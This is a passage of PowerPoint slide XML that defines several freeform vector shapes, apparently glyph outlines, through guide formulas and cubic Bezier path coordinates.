                    <a:pt x="28" y="120"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="26" y="149"/>
                    <a:pt x="26" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="117" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="81" y="190"/>
                    <a:pt x="77" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="50" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="67" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="204" y="218"/>
                    <a:pt x="204" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="117" y="30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 name="Freeform 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDE00A8-4F86-4D32-A993-71D878E44789}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId42"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6081714" y="2840038"/>
              <a:ext cx="100013" cy="147638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 17 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 2 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 199 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="32"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="41"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="15"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="150" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="2"/>
                    <a:pt x="102" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="149"/>
                    <a:pt x="25" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="66" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="203" y="218"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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1" name="Freeform 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE10542-7126-4496-B2BB-05680689E9CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId43"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6227764" y="2909888"/>
              <a:ext cx="26988" cy="26988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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2" name="Freeform 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A371FA-ED61-4CD0-A515-5380B4BB1D28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId44"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6311901" y="2841625"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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3" name="Freeform 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A015D69-4373-43BC-B976-63089A73AD60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId45"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6418264" y="2841625"/>
              <a:ext cx="87313" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 103 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 103 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 103 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 35 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 103 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 103 w 205"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="205" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="103" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="48" y="222"/>
                    <a:pt x="103" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="205" y="174"/>
                    <a:pt x="205" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="103" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="192"/>
                    <a:pt x="35" y="155"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="103" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="140" y="192"/>
                    <a:pt x="103"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4" name="Freeform 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAE0E0B1-79F0-47B1-97CA-729429851160}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId46"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6516689" y="2841625"/>
              <a:ext cx="109538" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 84 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 115 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 115 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 93 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 202 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 202 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 180 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 238 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 230 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 230 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="10" y="34"/>
                    <a:pt x="28" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="218"/>
                    <a:pt x="84" y="218"/>
                    <a:pt x="84" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="76" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="31"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="93" y="188"/>
                    <a:pt x="93" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
